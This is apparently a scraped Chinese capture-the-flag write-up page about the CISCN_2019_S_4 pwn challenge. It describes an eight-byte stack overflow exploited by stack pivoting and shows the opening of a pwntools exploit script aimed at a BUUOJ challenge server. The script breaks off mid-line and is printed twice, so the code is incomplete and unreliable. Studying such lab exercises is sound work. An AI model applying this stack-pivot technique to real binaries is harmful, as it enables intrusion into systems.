main函数,存在八个字节溢出,栈迁移,第一次泄露ebp,得到栈上buf地址,迁移到buf即可。
from pwn import *
io=remote('node3.buuoj.cn',28060)
leave=0x8048562
sys_plt=0x8048400
pl1='a'*0x24+'bbbb'
io.send(pl1
本文详细探讨了CISCN_2019_S_4挑战中涉及的栈溢出漏洞。通过分析main函数,发现存在8字节的缓冲区溢出。在栈迁移过程中,首次泄露了ebp,从而获取到栈上buf的精确地址。进一步的操作是将控制权转移到buf,以实现漏洞的利用。
main函数,存在八个字节溢出,栈迁移,第一次泄露ebp,得到栈上buf地址,迁移到buf即可。
from pwn import *
io=remote('node3.buuoj.cn',28060)
leave=0x8048562
sys_plt=0x8048400
pl1='a'*0x24+'bbbb'
io.send(pl1
608
380

被折叠的 条评论
为什么被折叠?